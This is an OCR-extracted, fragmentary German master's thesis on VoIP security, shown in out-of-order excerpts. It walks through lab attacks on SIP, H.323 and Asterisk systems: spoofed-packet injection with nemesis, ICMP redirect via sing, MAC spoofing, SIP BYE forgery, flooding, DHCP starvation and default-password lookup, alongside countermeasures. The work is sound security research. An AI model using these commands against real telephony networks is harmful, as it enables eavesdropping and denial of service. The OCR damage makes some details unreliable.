286. nd einem Angriff ausgesetzt ist 8 4129 war mit 4111 im Gespr ch als Flooding einsetze pcap Wireshark 7 T J gt u ey feo File Edit View Go Capture Analyze Statistics Help Filter X Destination Protocol Info Expression Clear Apply 2 12 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Das Flooding erlaubt einem Angreifer das Angriffsziel so zu attackieren dass w hrend dem Angriff weder ankommende noch abgehende Gespr che aufgebaut respektive gef hrt werden k nnen Bei schon bestehenden Gespr chsverbindungen wird mit dem Einsetzen des Floodings der Medienstrom RTP Pakete total unterbunden das Angriffsziel ist nur noch damit besch ftigt die ankommenden INVITE Pakete zu verarbeiten Obenstehende Folgen gelten sowohl wenn das Angriffsziel ein einzelnes Terminal oder ein SIP Proxy Server ist Einziger Unterschied ist die Auswirkung des Angriffes ob nur ein User Agent alleine oder die ganze Telefoninfrastruktur betroffen ist Der Angriff auf den SIP Proxy Server hat auch gezeigt dass die Einschr nkung nicht nur w hrend dem Flooding besteht Der SIP Proxy Server ist w hrend dem Flooden komplett abgest rzt und musste neu gestartet werden F r einen Betrieb welcher auf die Funktionalit t der Telefonieinfrastruktur angewiesen ist kann dies verheerende Auswirkungen mit grossen finanziellen Einbussen haben Diplomarbeit VOIP Security 19 02 2009 S Sch r
287. nd gef lschte Ethernet Frames an den Switch senden so dass das Angriffsziel nicht mehr erreichbar ist gt Auch Denial of Service Angriff genannt 6 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer beabsichtigt den Asterisk Proxy Server mittels MAC Spoofing anzugreifen so dass dieser nicht mehr erreichbar sein wird Dazu muss er in Kenntnis der MAC Adresse des Angriffziels kommen welche mittels Enumeration SIP User amp Extension Siehe Kapitel 2 2 1 leicht ausfindig gemacht werden kann Sollte der Angreifer in der Lage sein den ganzen Netzwerkverkehr mitzuschneiden siehe Kapitel 1 4 kann er die MAC Adresse seines Angriffsziels auch im Trace eines Netzwerkmonitors herauslesen Mitschnitt des Netzwerkverkehrs ersichtlich ist die MAC Adresse des Angriffsziels File Edit View Go Capture Analyze Statistics Help Eilter v Expression Clear Apply Info Protocol Destination Frame 180 214 bytes on wire 214 bytes captured Ethernet II Src Dell_f0 22 43 00 14 22 f0 22 43 Dst Aastra_19 40 8f 00 08 5d 19 40 8F ee Der Angreifer gibt die ersniffte MAC Adresse seines Angriffziels in das Tool MAC MakeUp ein und berschreibt so seine effektive MAC Adresse mit derjenigen des Angriffziels Mac MakeUp ver 1 95d c 2003 2006 HAC Works See Select an adapter from the list below About Mac Makeup 0004 on PCI gt Broadcom 590x 10 100 Ether
288. nde offene Arbeiten Diplomarbeit VOIP Security Legende Tendenz 7 Verbsserung gleich bleibend Verschlechterung 9 Sitzung mit Betreuer am 3 2 2009 Ang iffe suf die PBX Ascotel sbgeschlossen Dokumentation Die get tigten Angriffe und Analysen werden dokumentiert und die Resultate festgehalten Zusstzinformstionen zu den einzelnen Kapiteln werden in die Dokumentation eingef gt Appendix und Inhaltsverzeichnis m ssen noch erstellt werden Vorbereitung f r Kurzpr sentation steht noch aus Ebenfalls wird parallel dazu ein Arbeis Log gef hrt 19 02 2009 S Sch r MAS 06 02 20 Seite 234 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 14 4 9 Statusbericht Nr 9 Projektangaben Titel der Arbeit VOIP Security Nummer MAS 08 02 20 Datum Statusbericht Dienstag 17 Februar 2009 Projektbeteiligte Auftrsggebe Selbstcingebrschtes Thems Bereus Kurt J rmenn Aastra Telecom Schweiz AG Experte Mathiss Engel Cssssrius AG Diplomand Autor Ststusbericht Stefan Sch Asstra Telecom Schweiz AG Zusammenfassung Posten IST Begr ndung pe Termine Im Fertigstellungs Stress Quelitst Genauigkeit bei Dokumentation angestrebt Sehr gute Motivation Ende istsehr nahe nde IST Situation Legende Tendenz 7 Verbesserung auf Kurs vom Kurs leicht sbgewichen stark vom Kurs abgewichen gleich bleibend Verschlechterung bersicht der Arbeite
289. nden aus Bequemlichkeit oder administrativen Gr nden genau diese Standardpassw rter nicht abge ndert Durch das Ver ffentlichen untenstehender Dokumente ist es dann ein Einfaches f r einen Angreifer unerlaubt in Administratoren oder Kundenbereiche von Systemen oder Terminals zu gelangen 2 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff In Kapitel 2 2 1 wurden durch den Portscanner Zenmap zahlreiche Hosts Terminals welche den Port 5060 auf dem Netzwerk abh ren gefunden Dazu wurde jedes Mal die MAC Adresse detektiert und somit auch der Hersteller des entsprechenden Devices Mit dem Wissen dass es sich bei Port 5060 um SIP handelt und dem nun auch bekannten Ger tehersteller wird in Google spezifisch nach Standard Admin Passw rtern gesucht gt aastra admin SIP Passwort Google Suche Mozilla Firefox Datei Bearbeiten Ansicht Chronik Lesezeichen Extras Hilfe Aa a 3 http www google ch search hl de amp q aastra admin SIP Passwort P Meistbesuchte Seiten gt Erste Schritte 5 Aktuelle Nachrichten http www aastra ch Web Bilder Maps News Groups Google Mail Mehr v z Erweiterte Suche Google aastra admin SIP Passwort Suchen Einstellungen Suche Das Web Seiten auf Deutsch Seiten aus der Schweiz Web Meinten Sie aastra admin ZIP Passwort IPTAM PBX Ihre VoIP Telefonanlage Aastra 57i Melden Sie sich mit dem Benutzernamen admin und dem zugeh rigen Passwort an Im Au
290. ndes Wissen hinsichtlich Installation Anwendung und der Technik des Angriffsziels Ohne dieses Wissen f hren die meisten Angriffe nie zu einem Erfolg Nur sehr wenige Angriff Tools sind so beschaffen dass sie sich ohne grosses Wissen betreffend der eingesetzten Technik bedienen lassen und ein Angriff zum Erfolg f hrt Eines dieser Tools ist Cain amp Abel Es geh rt infolge eines fast selbsterkl renden GUT s und zahlreicher Anleitungen wohl zu den gef hrlichsten Angriff Tools die im Internet kostenlos downloadbar sind W hrend dieser Diplomarbeit konnte ich mein erlerntes Wissen aus dem Studiums Unterricht hinsichtlich Netzwerk Sicherheit Security und Privacy vollumf nglich einsetzen Es konnten sogar teilweise noch Wissensl cken dank intensiver Besch ftigung mit der Thematik geschlossen werden VOIP Security ist ein sehr grosses Gebiet welches nicht im Rahmen einer ca 360 st ndigen Diplomarbeit abgehandelt werden kann Die im Pflichtenheft definierten Ziele wurden zwar mehrheitlich angegangen und erledigt jedoch war dies nur mit einem enormen zeitlichen Mehraufwand m glich welcher im Rahmen dieser Diplomarbeit nicht eingerechnet war und in den letzten drei Monaten absolut keine Freizeit erlaubte So wurde auch die M he nicht gescheut bei einem renommierten Buchautor Hacking VOIP und bei weiteren Entwicklern von Angriff Tools offene Fragen per Mail zu platzieren siehe Anhang Mailverkehr Diese Arbeit kann nicht mit einem Projek
291. net ver 10 9 0 0 mMac address 71 New address 001422702243 el Senenterandom Manufacturer Can t find OID database MAC history _ Extra info NV Filter virtual interfaces IV Auto Nic Off on IP extra features Cycle interface now 10 54 10 Bringin up Broadcom 590x 10 100 Ethernet ver 10 9 0 0 p 10 56 35 Removed spoofed MAC address 10 56 35 Powercycling Broadcom 590x 10 100 Ethernet ver 10 9 0 0 10 56 35 Shutting down Broadcom 590x 10 100 Ethernet ver 10 9 0 0 10 56 35 Bringin up Broadcom 590x 10 100 Ethernet ver 10 9 0 0 10 59 20 Invalid MAC address cannot spoof to 11 00 05 Powercycling Broadcom 590x 10 100 Ethernet ver 10 9 0 0 11 00 05 Shutting down Broadcom 590x 10 100 Ethernet ver 10 9 0 0 11 00 06 Br rg n ip Broadcom 590x 10 100 Ethernet ver 10 9 0 m Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 140 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Unten ist die MAC Tabelle des Switches zu sehen an welchem das Angriffsziel angeschlossen ist Die MAC Adresse 00 14 22 f0 22 43 ist aktuell dem Switchport 6 zugeteilt Dies ist ein Abbild der MAC Tabelle vor dem Angriff IP address 10 11191 Name B03BE t k Location Bern Contact 18 Jan 109 10 13 57 Say p UpTime 0d 00h 07m 36s Fault Management Mac Address Table wc Update Reset Upgrade List of the MAC addresses currently k
292. net Protocol Security ist ein Sicherheitsprotokoll das f r die Kommunikation Uber IP Netze die Schutzziele Vertraulichkeit Authentizitat und Integritat gewahrleisten soll Mit IRDP ICMP Router Discovery Protocol werden Endsysteme ber die IP Adresse des im Netz zust ndigen Gateways informiert Ein Angreifer kann mit gef lschten IRDP Paketen den Default Gateway Eintrag eines Endystems berschreiben so den Paketstrom umleiten und dadurch einen DoS einleiten oder die Paketinhalte manipulieren sie mitschneiden oder eine Sitzung komplett bernehmen Durch einen IRDP Angriff k nnen alle VoiP Systemkomponenten kompromittiert werden Bei einer LAND Attacke ist in dem TCP Verbindungsaufbaupaket das SYN Flag gesetzt und wird an das Zielsystem versendet wobei Quell IP und Quell Port sowie Ziel IP und Ziel Port identisch sind Das Zielsystem sendet die Antwort an sich selbst infolgedessen steigt die CPU Last enorm es k nnen keine weiteren Anfragen bearbeitet werden F r die betroffenen VoIP Systeme kommt es zu den gleichen Folgen wie bei SYN Flood Attacken Durch die Aussendung einer erheblichen Anzahl von Frames mit unterschiedlichen gef lschten MAC Adressen kann die MAC Table eines Switches derart aufgef llt werden dass die Grenze des zur Verf gung stehenden Speichers berschritten wird In diesem Fall flutet der Switch empfangene Rahmen an alle Ports auch auf den des Angreifers und ein Angreifer kann beispielsweise die Sig
293. nformation Gathenng Da Network Mapping Nulnerability identification LS Penetration Privilege Escalation __ Maintaining Access ee Radio Network Anatysis YF VOIP amp Telephony Analysis 2 Digital Forensics Reverse Engineering Miscellaneous Diplomarbeit VOIP Security gt gt gt gt gt 19 02 2009 ee VoIP Analysis 000OO0OHOO0H0OOOO0OHODOOODODO 0 S Sch r MAS 06 02 20 9 7 fi 3 PROTOS H 323 Fuzzer PROTOS SIP Fuzzer PcapSipDump RTPbresk RTPflood RTPinsertsound ATPmixsound ScTPscan SIPSek SIPbomber SIP lt rack SiPdump SIPp SIPvidous Smap Vnek VoIP Hopper volrPong VolPong Cti Wolper vomit add_registrations enumiax erase_registrations iwar jiexflood imvitetioed redirectpoison reghijacker Sip_rogue teardown Seite 26 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 2 SIP Session Initiation Protocol Einf hrung SIP ist das am meist eingesetzte VOIP Signalisierungsprotokoll Daher ist es auch nicht verwunderlich weshalb gerade dieses Thema die Diskussionen betreffend VOIP Security dominiert Eine kurze Einf hrung in SIP soll zum besseren Verst ndnis der nachfolgende Angriffe Analysen beitragen Die Sicherheit von SIP kann nicht auf ein einzelnes IP Telefon herunter aufgesplittet werden Die in dieser Arbeit aufgezeigten Angriffe sind anwendbar f r s mtliche IP Telefone welche SIP unterst tzen Egal ob es
294. ng Tree Topologie neu berechnen Der Switch kann dadurch lahm gelegt werden Ebenfalls kann auch der gesamte Datenverkehr ber den PC des Angreifers gelenkt werden wo dieser dann s mtliche Infos mith ren kann MitM Attacke Angreifer startet jede Menge Verbindungsanfragen Das betroffene System ist nur noch mit der Beantwortung dieser Anfragen besch ftigt Die Verf gbarkeit dieses Systems wird dadurch stark eingeschr nkt oder g nzlich ausgeschaltet Zum geforderten Zeitpunkt sollen dem User Funktionen oder Informationen eines IT Systems zur Verf gung stehen Nur berechtigte User haben Zugriff auf Daten Dies dient dem Schutz der Privatsph re Beim Switch ist oft jeder Port auf den Trunk Modus auto eingestellt Der Angreifer sendet gef lschte Dynamic Trunking Protocol DTP Pakete und bekommt so Zugang zu allen VLAN und kann somit alle Layer 2 Attacken ausf hren Sprachtelefonie ber IP Netze wie Intranet oder Internet 1 5 Referenzen Internetadressen http www voipsa org http de wikipedia org wiki IP Telefonie http www hackingvoip com Literaturreferenzen VOIP Security Eren amp Detken ISBN 978 3 446 41086 2 Hacking VOIP Exposed Endler amp Collier ISBN 978 0 07 226364 0 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 212 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 2 Ziele und Anforderungen 2 1 Ziele Die heute am meisten
295. ngen der User Agents worin die Registrierungsdaten ersichtlich sind welche er f r weitere Angriffe benutzen kann Auch hat der Angreifer die M glichkeit die bei ihm vorbeikommenden Daten zu manipulieren respektive abzu ndern und dann erst zum effektiven Bestimmungsort weiterzuleiten Dieser Angriff ist sehr wirkungsvoll und daher sehr gef hrlich f r seine Angriffsziele Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 138 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz http www gorlani com portal dl_popular asp Hinweise zu Installation Verf gbarkeit Das Tool ist nur unter Windows lauff hig Benennung Angriffe Analyse Angriff Analyse gegen 6 2 1 Denial of Service MAC Spoofing Integrit t rede RE Vertraulichkeit Eingesetztes Tool Verf gbarkeit MAC MakeUp Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Installation Tool Anwendung Tool Erforderliche Vorkenntnisse Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel Wert Ziel Angriff Analyse Der Angreifer berschreibt seine eigene MAC Adresse mit derjenigen die das Angriffsziel in der aktiven Ethernetkonfiguration hat Das Angriffsziel ist ab diesem Augenblick nicht mehr erreichbar Ein Angriff auf den VOIP Server legt somit den ganzen Telefoniever
296. ngriffe sollen gezielt bez glich der bekannten Sicherheitskriterien Verf gbarkeit Integrit t und Vertraulichkeit ausgef hrt und dokumentiert werden Mit dem Erkennen der Schwachstellen sind die dazu erforderlichen sicherheitsrelevanten Gegenmassnahmen zu benennen Die auszuf hrenden Analysen und Angriffe sollen auf die g ngigsten VOIP Signalisierungs und Medientransport Protokolle angewendet werden Es sind dies namentlich Signalisierungs Protokolle VOIP H 323 Packet based Multimedia Communications Systems ITU T Standard Session Initiation Protocol SIP IETF RFC 3261 Session Description Protocol SDP IETF RFC 4566 Inter Asterisk eXchange Protocl TAX MGCP und Megaco Media gateway Control Protocol H 248 gem Spec ITU T und IETF Medientransport Protokolle VOIP Real Time Transport Protocol RTP Real Time Control Protocol RCTP Die Signalisierungs und Sprachdaten von VOIP Verbindungen kommunizieren wie die Internetprotokolle tiber IP TCP und UDP und nutzen dieselbe Netzwerkinfrastruktur Daher gelten auch die gleichen Schwachstellen fiir VOIP wie wir sie von den IP Netzwerken her kennen Die meisten Angriffe auf VOIP Verbindungen zielen nicht direkt auf das Signalisierungs oder Medientransportprotokoll von VOIP selbst ab sondern auf die Netzwerkinfrastruktur Diese Angriffe sind ebenfalls zu analysieren festzuhalten und die erforderlichen Gegenmassnahmen aufzuzeigen Diplomarbeit VOIP Security 19 02 2009 S
297. ngriffsziel H MAC Adrese des zu spoofenden Endpoints Servers M MAC Adresse des Zielobjektes P iSEC Registration Reject Aufruf des Tools zur Paketbildung nemesis udp x 1719 y 2171 S 10 1 1 241 D 10 1 1 151 H 00 1E EC 0B AD 96 M 00 1c c0 07 f3 50 P i SEC Registration Reject DOS v UDP Packet Injection The NEMESIS Project Version 1 4 Build 26 MAC 00 1E EC 0B AD 96 gt 00 1C C0 07 F3 50 Ethernet type IP 0x0800 IP 19 1 1 241 gt 18 2 1481 IP ID 37567 IP Proto UDP 17 IP TTL 255 IP TOS 0x00 IP Frag offset 0x0000 IP Frag flags UDP Ports 1719 gt 2171 Wrote 60 byte UDP packet through linktype DLT_EN10MB UDP Packet Injected Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 111 Berner Fachhochschule Technik und Informatik Software Schule Schweiz In Paket Nr 9 sendet der Angreifer eine gespoofte Registration Reject Nachricht an den Endpoint 4151 Dieser best tigt seine Registrierungs L schung an den Gatekeeper mit Paket Nr 10 zur ck In Paket Nr 12 best tigt der Gatekeeper dem Endpoint seine Registrierungs L schung U Untitled Wireshark u Eile Edit View Go Capture Analyze Statistics Help Filter y Expression Clear Apply No Time Source Destination Protocol Info ii 6 5 101987 topia_21 7 Compalin_Ob ad 96 ARP 10 1 1 1 is at 00 0f cc 21 79 14 7 8 974714 cCompalIn_0b ad 96 Broadcast ARP who has 10 1 1 151 Tell 10 1 1
298. ngriffsziele Diese Kenntnis bef higt ihn weitere gezielte Angriffe gegen diese Ziele zu starten 4 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer will das Netzwerk nach H 323 Endpoints oder Gatekeepern scannen F r den Angriff selbst ist der Zugang zum Netzwerk erforderlich sei es lokal oder per remote aus der Ferne Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet nmap sT p 1718 1719 1720 1731 10 1 1 0 24 Die Werte im Einzelnen stehen wie folgt f r nmap Aufruf Tool in Python Umgebung sT TCP Connect Scan p 1718 1719 1720 1731 Ports die offen sind nach welchen gescannt werden soll 10 1 1 0 24 Netzwerk Range in welchem gesucht werden soll ok ok bt nmap sT p 1718 1719 1720 1731 10 1 1 0 24 Interesting ports on 10 1 1 101 PORT STATE SERVICE 1718 tcp closed unknown 1719 tcp closed unknown 1720 tcp open H 323 Q 931 173 1 tcp closed unknown MAC Address 00 14 22 F0 22 43 Dell Interesting ports on 10 1 1 151 PORT STATE SERVICE 1718 tcp closed unknown 1719 tcp closed unknown 1720 tcp open H 323 Q 931 173 1 tcp closed unknown MAC Address 00 1C C0 07 F3 50 Intel Corporate Nmap done 256 IP addresses 9 hosts up scanned in 40 811 seconds KKK Untenstehend zum Beispiel ist der Endpoint 4151 mit der IP Adresse 10 1 1 151 als Teil der Scannresultate aufgelistet Es ist zu sehen dass der Port 1720 offen steht und auf
299. nitiiert gegen ber dem aufgerufenen Gespr chspartner authentifiziert 82 2 Asterisk und MIDCOM Die M glichkeiten einer SIP Absicherung bei Asterisk sind sehr begrenzt MIDCOM ist eine Middle Box mit welcher eine Absicherung des SIP Protokolls erzielt werden kann RFC 3234 definiert die Taxonomie und Sachverhalte der Middle Boxen Die Funktion einer Middle Box beruht auf einer anwendungsbasierten Durchsetzung von Richtlinien beim Datentransport in Echtzeit Beispiele solcher Einrichtungen sind Paketfilter Firewalls NAT VPN Intrusion Detection Systeme Je nach Verwendungszweck wird eine Middle Box gem ss RFC 3234 in eine der drei verschiedenen Kategorien eingestuft Verbesserung der Performance Gleichartige Netze in Sicherheitszonen aufteilen Unterschiedliche Netze zur Interoperabilit t verbinden Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 188 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 8 3 Massnahmen gegen Angriffe auf H 323 W hrend der Substandard H 235 0 die Architektur beschreibt werden in den Substandards H 235 1 bis H 235 9 die Sicherheitsprofile beschrieben Dabei lassen sich diese 9 Substandards nochmals wie folgt aufteilen Die Substandards H 235 1 bis H 235 5 regeln die Absicherung der Signalisierung Die Substandards H 235 6 bis H 235 8 regeln die Absicherung des Medientransportes Der Substandard H 235 9 regelt die Absicherung der Gateways
300. nown by the switch this operation is slow when the list is long SNMP index MAC address Learned on Port Learning Method Filter Packets to this Address Spanning Tree 1 00 00 81 65 49 8b NA Static No Zu 2 00 08 54 19 40 8 18 Dynamic No a 3 00 08 54 19 93 a7 20 Dynamic No lsecurity 4 00 08 cc 21 79 14 23 Dynamic No Management Access 5 Dynamic JE Network Access 6 00 1c c0 07 f3 50 Dynamic No 7 MnAser NHan ar z Dunamis I Na Untenstehend die MAC Tabelle nach dem Angriff Die MAC Adresse 00 14 22 f0 22 43 ist pl tzlich dem Switchport 2 zugewiesen An diesem Port befindet sich der Angreifer welchem es durch die gef lschten Ethernet Frames gelang die MAC Tabelle zu berschreiben Somit werden alle Datenpakete welche eigentlich f r Port 6 bestimmt gewesen w ren an den Port 2 gesendet F r den Switchport 6 an dem das Angriffsziel angeschlossen ist gibt es keinen g ltigen Eintrag mehr Der Angriff wurde erfolgreich ausgef hrt das Angriffsziel ist nicht mehr erreichbar address 10 1 1 191 Name www baynetworks com Lecaten 18 Jan 109 10 37 32 z UpTime 0d 00h 32m 125 Fault Management Mac Address Table Update List of the MAC addresses currently known by the switch this operation is slow when the li Index MAC address Learned on Port Learning Method Filter Packets to 1 00 00 81 65 49 8b NA Static No 2 00 08 54 19 40 88 m I fi 00 08 54
301. nt Discovery SIP Scanner Utilities Message Generator Authentication Analysis SIP Message Domain Host 10 1 1 101 Method Transport Called User BYE WR watt Via SIPf2 0 UDP 10 1 1 241 To alce lt sip 4111 10 1 1 101 gt _ ben lt sip 4129 10 1 1 101 gt Branch From Authentication Call ID 5b421e9ec32bfe0519751c341e 10 1 1 101 Csea 2BYE Contact i Record Route Subject Content type User Agent Expires Max Forwards 70 Event Refer To Content Leng E Use SDP gt ta as346f 1fc4 SDP message v 0 o user 29739 7272939 IN IP4 192 168 1 2 r IM TDA 109 14681 9 Conversation Log BYE sip 4111 10 1 1 101 SIP 2 0 Via SIP 2 0 UDP 10 1 1 241 branch From ben lt sip 4129 10 1 1 101 gt tag as346f1fc4 To alice lt sip 4111 10 1 1 101 gt Call ID 4681905b421e9ec32bfe0519751c341e 10 1 1 101 CSeq 2 BYE Max_forwards 70 Expires 3600 Content Length 0 Source Port 5060 Packets to Send Message Generation Progress 1 NINA Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 70 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Nachfolgender Printscreen zeigt wie die BYE Nachricht an den SIP Proxy Server gesendet wird welcher wiederum die Nachricht an den User Agent 4
302. och auf ihrem Weg zum Ziel gelesen und interpretiert werden k nnen Deshalb bietet sich nur eine Punkt zu Punkt Implementation an IPsec bietet Authentifizierung Integrit t und Vertraulichkeit f r die zu bertragenden Datenpakete IPsec wird oftmals als die Wunderwaffe verstanden wenn es darum geht nicht VOIP Anwendungen zu sichern Fehlende Spezifikationen und Ressourcenprobleme im Einsatz bei Echtzeitanwendungen lassen IPsec jedoch nur als optionale M glichkeit gelten TLS wird heute IPsec vorgezogen wenn es um die Absicherung des SIP Protokolls geht 8 2 Massnahmen gegen Angriffe auf Asterisk und das A X2 Siganlisierungsprotokoll Asterisk unterst tzt die Protokolle SIP H 323 TAX MGCP UNIStim sowie auch das Skinny Client Control Protocol Somit ist Asterisk nicht nur angreifbar mit seinem eigenen Protokoll IAX sondern haupts chlich auch durch die Verwundbarkeiten der anderen implementierten Protokolle 8 2 1 Asterisk und Verschl sselung Ab der Version Asterisk 1 2 4 ist es m glich nach erfolgter Authentifizierung mittels MD5 den ganzen IAX2 Kanal einschliesslich Sprachdaten zu verschl sseln Dies wird ber eine 128 Bit AES Verschl sselung bewerkstelligt MD5 f r die vorangehende Authentisierung ist vorausgesetzt weil die Verschl sselung davon abh ngig ist Weiterhin bietet das AX Protokoll die M glichkeit einer RSA Verschl sselung Dank dieser asymmetrischen Verschl sselung wird ein Benutzer der einen Anruf i
303. ocol Src Port bootps 67 Dst Port bootpc 68 Bootstrap Protocol Message type Boot Reply 2 Hardware type Ethernet Hardware address length 6 Hops O Transaction ID 0x0836c40e seconds elapsed O Bootp flags 0x0000 unicast Client IP address 0 0 0 0 0 0 0 0 Your client IP address 10 1 1 113 10 1 1 113 Next server IP address 0 0 0 0 Relay agent IP address 0 0 0 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 170 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 6 10 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Infolge des Angriffes sind keine freien IP Adressen mehr verf gbar die Endger te k nnen sich nicht mehr am Netzwerk anmelden und sind daher weder f r abgehende noch ankommende VOIP Verbindungen brauchbar Durch diesen Angriff DoS Denial of sService ist die Verf gbarkeit der ganzen Telefonieinfrastruktur eingebrochen DHCP Rouge Server Durch das Einbringen eines eigenen DHCP Servers werden alle Datenstr me ber den Gateway des Angreifers gelenkt der dabei die Daten mittels Netzwerkmonitor aufzeichnet und somit in Kenntnis des Kommunikations Inhaltes kommt Auch kann er so gesniffte Daten wie zum Beispiel Benutzernamen und Passw rter f r weitere Angriffe verwenden Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 171 eo Berner Fachhochschule F Technik und Informatik Software
304. ocol Info 381 20 833025 2053525321 20738526401 SIP SDP Request INVITE 51p 4119 10 1 1 101 5060 with session description ff Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 56 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 2 7 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Da der Registrierungszustand eines User Agents nicht dauernd vom Registrar und dem Terminal berwacht wird ist dieser Angriff schwer zu erkennen Registration Hijacking gibt es in verschiedenen Varianten blicherweise ist es das Ziel die SIP Registration eines anderen User Agents zu hijacken so dass alle einkommenden und abgehenden Verbindungen auf dem Terminal des Attackers einlaufen respektive gef hrt werden k nnen und der urspr ngliche User Agent der gehijackte nicht mehr verf gbar ist Weitere Varianten des Hijacken sind Hijacking eines User Agents zu einer ung ltigen Destination Alle eingehenden Anrufe f r diesen User Agent gehen dann verloren bis sich der gehijackte User Agent wieder korrekt registriert Der Angreifer jedoch hat mittels eines kleinen und einfach zu schreibenden Skriptes die M glichkeit die Intervallzeit seiner hijackenden Registrierung so klein zu w hlen dass die korrekte Registrierung des Angriffziels immer gleich wieder berschrieben wird Anrufe des Angriffszieles User Agent parallel auf dem Terminal des Angreifers rufe
305. oe Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Diplomarbeit zur Erlangung des Diploms Master of Advanced Studies in Information Technology MAS IT MAS 06 02 20 Version gek rzt ohne Kapitel 7 und 14 5 Bern 19 Februar 2009 Verfasser Stefan Sch r MAS 06 02 20 sschaer aastra com Experte Mathias Engel mathias engel cassarius ch Betreuer Kurt J rmann kjaermann aastra ch eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Abstract VOIP soll bez glich der Sicherheitsaspekte Integrit t Vertraulichkeit und Verf gbarkeit analysiert angegriffen und bewertet werden Zum Einsatz kommen Tools welche im Internet frei herunter geladen werden k nnen Die Diplomarbeit weist auf die Gefahren und Schwachstellen der VOIP Telefonie hin Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 2 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz Danksagung Fiir die hervorragende Unterstiitzung bei meiner Diplomarbeit seitens des Experten Herrn Mathias Engel und des Betreuers Herrn Kurt J rmann welche immer ein offenes Ohr f r meine Fragen und Bemerkungen hatten bedanke ich mich bei ihnen sehr Ich m chte es auch nicht unterlassen allen Dozenten die mich w hrend meines MAS Studiums begleitet haben ein ganz grosses Dankesch n auszusprechen Nur dank ihrem grossen Wissen das sie meinen Studienkollege
306. oftware Schule Schweiz 8 42 Tunneln mit IPsec Es konnen verschiedene Verschliisselungsalgorithmen wie DES 3DES AES etc angewendet werden Es werden die Modi Transport und Tunnelmodus unterstiitzt Beim Transportmodus werden nur die Nutzdaten also die RTP Pakete verschliisselt Dies bietet den Vorteil dass infolge der weniger gebrauchten Rechenleistung die Ressourcen der Terminals und VOIP Server weniger beansprucht werden Dabei werden jedoch fiir den Angreifer immer noch die urspr nglichen IP Header lesbar sein welche zum Bsp Auskunft ber Quell und Zieladressen der Pakete geben ESP Encapsulation Security Payload w rde auch den Header verschl sseln der RTP Datenstrom h tte jedoch dadurch einen sehr grossen Overhead welcher hohe Verz gerungszeiten mit sich bringen w rde und somit eine Verschlechterung der Gespr chsqualit t QOS bedeuten w rde Auch w rden sehr hohe Anforderungen betreffend Rechenleistung an die Terminals gestellt was sich wiederum auf deren Verkaufspreise auswirkt Zu Zeit wird die Verschl sselung mittels TLS S MIME oder SRTP dem Tunneln ber IPsec noch vorgezogen Die Zusammenarbeit seitens der Ger tehersteller die grosse Verbreitung und das grosse Interesse am Markt werden jedoch f r eine baldige Kehrtwende sorgen 8 5 Massnahmen gegen Angriffe im Netzwerk 8 5 1 Massnahmen gegen ARP Spoofing Die Empf nger von ARP Nachrichten pr fen nicht von wo aus die ARP Nachricht gesendet wurde und bernehm
307. ol Nachrichten dienen im Netzwerk f r den Austausch von Informations und Fehlermeldungen Jeder Router und Rechner im Netzwerk muss solche Nachrichten verstehen und interpretieren k nnen Eine dieser Informationsmeldungen teilt den Hosts im Netzwerk mit welcher Default Gateway f r sie zust ndig ist Gelingt es dem Angreifer eine solche gespoofte Informationsmeldung an einen Host zu senden so kann er dessen Default Gateway ndern Dabei tr gt der Angreifer entweder seinen eigenen Rechner oder einen selbst ins Netzwerk eingebrachten Gateway ein Ziel ist eine MitM Man in the Middle Attacke wobei das Angriffsziel seinen Datenstrom ber den Angreifer sendet welcher mittels Netzwerkmonitor den ganzen Datenverkehr aufzeichnet und in Kenntnis dessen Inhaltes kommt 6 93 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer stellt einen eigenen Gateway mit der IP Adresse 10 1 1 240 inklusive Internetzugang ins Netzwerk Sein Ziel ist es s mtlichen Sprach und Datenverkehr der vom Asterisk Proxy Server ins Internet geroutet werden muss ber diesen Gateway umzuleiten um dabei mittels Netzwerkmonitor den ganzen Sprach und Datenstrom aufzuzeichnen Im Terminalfenster von BackTrack 3 wird sing gestartet und der Angriff mit folgenden Argumenten aufgerufen sing red S 10 1 1 1 gw 10 1 1 240 dest 0 0 0 0 x host prot tcp psrc 100 pdst 90 10 1 1 101 Die Werte im Einzelnen stehen wie folgt f r sing Aufruf Pro
